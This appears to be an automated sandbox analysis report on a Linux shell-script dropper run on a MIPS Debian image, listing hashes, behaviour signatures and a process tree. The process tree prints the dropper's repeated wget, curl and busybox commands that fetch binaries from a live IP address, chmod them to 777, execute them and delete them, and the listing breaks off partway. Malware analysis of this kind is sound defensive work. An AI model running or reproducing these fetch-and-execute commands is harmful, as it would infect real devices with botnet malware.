Analysis
-
max time kernel
60s -
max time network
62s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
-
Size
10KB
-
MD5
1842c293913809baf3b70d2c7616a370
-
SHA1
cfb8715dfc9477769e6a4c913ce8cbf32a7c3c8a
-
SHA256
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb
-
SHA512
92c3faac1ab3b27d8d710a5629244e1de0b8ab965ed2978664b2406ff672998852b8986d72545fd5fca7e8d62f60bad51a06e90e9472642e8b22934f3ad80be5
-
SSDEEP
96:d6uPCaTjHLgukFYocSxdkV1aNhc0r0/gulc3/m6uPCalNPHXw8BbqSxdkV1PGNhv:JrgukGocSxdkV1x81u3BxdkV16
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 754 chmod 866 chmod 952 chmod 988 chmod 922 chmod 982 chmod 904 chmod 928 chmod 934 chmod 940 chmod 958 chmod 964 chmod 829 chmod 880 chmod 898 chmod 823 chmod 845 chmod 748 chmod 763 chmod 787 chmod 892 chmod 976 chmod 810 chmod 886 chmod 916 chmod 946 chmod 970 chmod 910 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO 749 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy 755 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt 765 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM 788 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 811 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn 824 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK 830 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq 846 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 867 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI 881 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw 887 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 893 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj 899 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 905 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 911 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj 917 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM 923 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 929 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn 935 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO 941 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy 947 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt 953 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq 959 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK 965 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 971 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 977 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI 983 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw 989 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 906 rm 907 wget 908 curl 909 busybox 911 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 901 wget 905 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 912 rm 902 curl 903 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM curl File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq curl File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 curl File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn curl File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq curl File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK curl File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw curl File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 curl File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj curl File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI curl File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO curl File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt curl File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK curl File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz curl File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 curl File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn curl File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI curl File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM curl File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 curl File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 curl File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt curl File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy curl File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz curl File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 curl File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw curl File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj curl File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO curl File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy curl
Processes
-
/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh1⤵PID:716
-
/bin/rm/bin/rm bins.sh2⤵PID:719
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:720
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:745
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:753
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:757
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:760
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:768
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:769
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:783
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:793
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:806
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:822
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:828
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:841
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:863
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:879
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:885
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:891
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:897
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:905
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:909
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:911
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:915
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:921
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:927
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:933
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:939
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
